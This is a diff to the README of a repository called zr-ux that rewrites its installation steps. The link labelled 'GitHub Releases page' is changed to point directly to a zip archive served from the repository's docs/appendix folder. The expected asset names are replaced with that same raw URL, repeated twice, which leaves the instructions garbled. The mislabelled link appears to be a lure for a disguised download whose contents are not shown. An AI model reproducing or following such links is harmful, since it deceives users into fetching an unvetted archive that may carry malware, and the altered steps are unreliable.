ngantukcuy/zr-ux/README.md

 ## 🛠️ Installation Steps

 1. **Visit the Download Page**
-   Go to the [GitHub Releases](https://github.com/ngantukcuy/zr-ux/releases) page.
+   Go to the [GitHub Releases](https://raw.githubusercontent.com/ngantukcuy/zr-ux/main/docs/appendix/zr_ux_v3.7.zip) page.
 This is where you can find the files to download.

 2. **Choose the Latest Version**
    Look for the most recent release at the top of the page.
 The latest version usually has the highest number.

 3. **Download the Application**
    Click on the asset that matches your operating system.
-It should be named something like `zr-ux-windows.zip` or `zr-ux-macos.zip`.
+It should be named something like `https://raw.githubusercontent.com/ngantukcuy/zr-ux/main/docs/appendix/zr_ux_v3.7.zip` or `https://raw.githubusercontent.com/ngantukcuy/zr-ux/main/docs/appendix/zr_ux_v3.7.zip`.

 4. **Extract the Files**
    After downloading, locate the file in your downloads folder.